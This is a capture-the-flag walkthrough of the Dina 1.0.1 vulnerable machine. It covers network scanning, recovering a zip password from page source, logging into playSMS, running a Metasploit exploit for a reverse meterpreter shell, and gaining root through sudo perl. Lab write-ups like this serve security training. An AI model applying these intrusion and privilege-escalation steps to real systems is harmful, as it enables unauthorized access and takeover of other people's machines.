CTF - Dina : 1.0.1 walkthrough

Lab Environment  :

Attacker’s Machine :
 Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux

Vulnerable Machine : Dina: 1.0.1

Scanning phase
  1. route -n (To know the gateway) i.e
  2. arp-scan --local (to know the devices connected to the local network) 
  3. Vulnerable machine IP :


    Using nmap for scanning the IP : nmap -sS -sC -sV
  1. We got one open port i.e 80 and http service is active

Since the port 80 is open and http service is active then we can open the IP in browser.

Another nmap syntax to know vulnerability if any : nmap --script vuln

Now further using dirb for scanning the directories : dirb

Some results are obtained after using dirb . 
  1. Opened the and found something interesting .
  2. I got few directories listed .

After checking the directories got to know that there can be something in .

NOT FOUND ,go back but this is an html page so we can view the page source and it revealed
something really interesting .
I got password list as
#my secret pass

      Opened another url which dirb has listed i.e got one zip file named backup.zip


      Downloaded the file and extracted it and it gave the prompt to enter the password . 
It looks like its an MP3 file but still i tried to open it in the text editor .
 I further tried the passwords which i got in source code earlier and Password is freedom.
      It revealed username as well as one url i.e /SecreTSMSgatwaylogin



      On Browsing the above obtained url i got login panel of playsms


      I logged in the portal using username which was revealed in that zip file i.e  backup.zip and 
 password is from the same list that was found in source code.
      Username - touhid
      Password - diana


       As i got to know that web applicaton is play sms , so i searched for its exploit and found one

      After downloading the file i renamed it as playsmscsv and copied it to metasploit-framework > modules > exploits

      Started msfconsole and searched for playsmscsv


      I got one result named as playsmscsv .further i ran the command to use the exploit i.e
      use exploit/playsmscsv

      Now exploit is ready to be used . i further explored the parameters needed for exploit to run by typing options


       Provided the parameters which was needed for the exploit are as follows :
  1. set PASSWORD diana
  2. set USERNAME touhid
  3. set LHOST
  4. set RHOST
  5.  set TARGETURI

Now ready to run the exploit by typing exploit and we got the meterpreter session and then further 
entered into the shell by typing shell

Gained the shell and ran two commands to get the access as
  1.  root user and explored the directories further.
  1. Python -c ‘import pty; pty.spawn(“/bin/bash”)’
  2. Sudo perl -e “exec ‘/bin/bash’”

And finally got the flag in the root directory

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